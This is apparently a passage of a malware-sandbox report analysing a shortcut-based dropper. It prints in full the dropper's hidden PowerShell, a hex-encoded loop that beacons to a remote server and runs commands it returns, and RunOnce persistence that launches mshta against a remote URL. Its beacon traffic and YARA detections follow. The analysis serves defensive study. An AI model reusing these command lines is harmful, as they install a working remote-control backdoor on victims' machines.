43725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"
cmdline	"C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^\| where-object {$_.length -eq 0x18C0000} ^\| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^\| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^\| select -Skip 74342)) -Encoding Byte;^& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
cmdline	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Protect\UserProfileSafeBackup.bat"

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 14, 2023, 9:04 a.m.	thread_identifier: 2656 thread_handle: 0x00000330 process_identifier: 2652 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: "C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^\| where-object {$_.length -eq 0x18C0000} ^\| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^\| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^\| select -Skip 74342)) -Encoding Byte;^& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI; filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000338	1	1
CreateProcessInternalW Aug. 14, 2023, 9:04 a.m.	thread_identifier: 2768 thread_handle: 0x00000084 process_identifier: 2764 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk \| where-object {$_.length -eq 0x18C0000} \| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw \| select -Skip 62464)) -Encoding Byte; & $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj \| select -Skip 74342)) -Encoding Byte;& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI; filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Aug. 14, 2023, 9:04 a.m.	thread_identifier: 1120 thread_handle: 0x00000090 process_identifier: 1216 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));" filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW Aug. 14, 2023, 9:04 a.m.	thread_identifier: 2100 thread_handle: 0x00000084 process_identifier: 2108 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 14, 2023, 9:05 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (39 events)

Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:42 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Content-Length: 16 Keep-Alive: timeout=5, max=100 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:43 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:44 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:45 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:46 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:47 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:48 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:49 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:50 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:51 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:52 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:53 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:54 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:55 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:56 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:57 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:58 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:05:59 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:00 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:01 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:02 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:03 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:04 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:05 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:06 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:07 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:08 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:09 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:10 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:11 GMT Server: Apache Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:11 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:12 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:13 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:14 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:15 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:16 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:17 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:18 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.
Data received	HTTP/1.1 404 Not Found Date: Mon, 14 Aug 2023 00:06:19 GMT Server: Apache Content-Length: 16 Content-Type: text/html; charset=UTF-8 File not found.

Poweshell is sending data to a remote host (2 events)

Data sent	POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 Connection: Keep-Alive
Data sent	POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 14, 2023, 9:04 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 14, 2023, 9:04 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (40 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications over P2P network	rule	Network_P2P_Win
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

